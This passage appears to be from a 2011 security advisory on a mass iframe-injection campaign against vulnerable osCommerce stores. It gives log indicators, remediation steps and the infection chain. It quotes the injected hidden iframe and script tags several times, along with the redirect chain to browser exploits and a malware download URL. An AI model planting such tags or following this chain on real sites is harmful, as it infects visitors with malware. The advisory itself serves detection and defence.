178.217.165.71 - - [23/Jul/2011:19:55:37 -0500] "GET /admin/configuration.php/login.php?cID=1&action=edit HTTP/1.1" 200 25014 "http://__Masked__by_armorize.com/admin/configuration.php?cID=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

[5. What Happens to Affected Websites]

1. The "Store Name" variable of osCommerce sites will be modified to inject one of the iframes below:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
2. For certain websites the attacker also leaves at least one (sometimes more) backdoors, or "webshells". This happens more especially for shared hosting accounts where the backdoor allows for access to multiple accounts on the same server:

[6. Remediation]

Below is our best attempt to describe the remediation procedures. If you have questions or would like us to do it for you please contact wayne@armorize.com.

1. Know if you've been infected.

1.1 Search your logs for:
1.1.1 Access from IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214.
1.1.2 Access with agent string: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)

1.2 Search your site for the existence of two iframes:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>

1.3 Or just have HackAlert find everything for you. We know it's good because we built it ;) (greetings Dave, borrowed your quote)

2. Install an anti-virus program on the computer you use to manage your website.

3. Find and remove the injected backdoors.

4. Find and remove the injected iframes / javascripts

5. Secure your osCommerce installation. Upgrade to the latest version and use .htaccess to protect admin directories.

6. Change your website hosting and your osCommerce admin passwords

A very good article on how to secure osCommerce can be found here (thanks Markus):

http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/

And the latest version of osCommerce can be downloaded here:

http://www.oscommerce.com/solutions/downloads

[7. Infection Details]

Here's the original youtube video we made of the entire infection process; at the time there were only 90,000 infected pages.

And here's the new one we made when there's over 6 million infected pages:

1. Infected website is injected with one of the following scripts:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>

2. Browser loads http://willysy.com/images/banners/, redirected (302) to http://papucky.eu/ext/

3. Contents of papucky.eu/ext/ is here on pastebin, loads javascript from http://gooqlepics.com/include.js?in=864

4. javascript here on pastebin, decodes to this, generates iframe pointing to:

http://yandekapi.com/api?in=864

5. Contents of http://yandekapi.com/api?in=864 is here, redirects to: http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV

6. Contents of http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV is here, decodes to this. This includes multiple browser exploits.

7. After successful exploitation, browser downloads and executes malware from here:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot

[8. Screenshots]

Vulnerable osCommerce installations allows modification of the site's variables without admin access:

The infection attempt, when not successful, has the injected iframe rendered as content (rather than executed) in the title part of the website. Below are some examples:
Read more (rest of article)...